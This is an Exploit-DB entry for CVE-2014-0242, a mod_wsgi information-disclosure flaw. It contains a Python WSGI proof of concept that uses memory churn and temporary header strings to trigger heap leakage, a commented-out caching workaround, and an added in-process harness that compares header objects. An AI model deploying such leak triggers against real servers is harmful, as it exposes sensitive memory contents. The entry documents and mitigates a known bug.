- 18 Dec 2022
- EDB-ID
- 39196
- EDB Verified
- Passed
- Author
- BUCK GOLEMON
- Vulnerability type
- REMOTE
- Platform
- LINUX
- CVE
- cve-2014-0242
- Publication date
- 2014-05-21
Apache mod_wsgi - Information Disclosure
Code:
source: https://www.securityfocus.com/bid/67534/info
mod_wsgi is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
```python
import functools
import threading
import time
import random

def run(*args):
    # Background churn: keep allocating and dropping short strings of 'X'.
    while True:
        items = []
        for i in range(1000):
            items.append((int(random.random()*20)*'X'))
        time.sleep(0.00001)

thread = threading.Thread(target=run)
thread.start()

def headers():
    # upper().lower() builds a new string object on every call.
    return [('Content-Type', 'text/plain'.upper().lower())]

def response():
    yield 'Hello World!\n'

_content_type_cache = {}

def intern_content_type(application):
    # Workaround wrapper: route every Content-Type value through a
    # module-level cache so the same string object is reused across requests.
    @functools.wraps(application)
    def _wrapper(environ, start_response):
        def _start_response(status, headers, *args):
            _headers = []
            for header, value in headers:
                if header.lower() == 'content-type':
                    value = _content_type_cache.setdefault(value, value)
                _headers.append((header, value))
            return start_response(status, _headers, *args)
        return application(environ, _start_response)
    return _wrapper

# Decorator left commented out, so the application runs without the workaround.
#@intern_content_type
def application(environ, start_response):
    status = '200 OK'
    start_response(status, headers())
    return response()
```
- Source
- www.exploit-db.com
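
The only switch in the PoC is the commented-out `@intern_content_type` line. The in-process harness below is an added example, not part of the original PoC: it shows that without the wrapper each request hands `start_response` a fresh temporary Content-Type string, while with it every request reuses one cached object. `observe` and `distinct_objects` are hypothetical helper names, and no Apache or mod_wsgi is involved.

```python
import functools

_content_type_cache = {}

def intern_content_type(application):
    # Same wrapper as in the PoC above.
    @functools.wraps(application)
    def _wrapper(environ, start_response):
        def _start_response(status, headers, *args):
            _headers = []
            for header, value in headers:
                if header.lower() == 'content-type':
                    value = _content_type_cache.setdefault(value, value)
                _headers.append((header, value))
            return start_response(status, _headers, *args)
        return application(environ, _start_response)
    return _wrapper

def application(environ, start_response):
    # Same shape as the PoC: the header value is a fresh temporary string.
    start_response('200 OK', [('Content-Type', 'text/plain'.upper().lower())])
    return iter([b'Hello World!\n'])

def observe(app, requests=5):
    """Call app in-process (hypothetical helper) and return the
    Content-Type objects it passed to start_response."""
    seen = []
    def start_response(status, headers, *args):
        seen.extend(v for h, v in headers if h.lower() == 'content-type')
    for _ in range(requests):
        list(app({'REQUEST_METHOD': 'GET'}, start_response))
    return seen

def distinct_objects(values):
    # Count objects by identity; the caller's list keeps them all alive,
    # so equal ids really mean the same object.
    return len({id(v) for v in values})

if __name__ == '__main__':
    print('unwrapped:', distinct_objects(observe(application)))
    print('wrapped:  ', distinct_objects(observe(intern_content_type(application))))
```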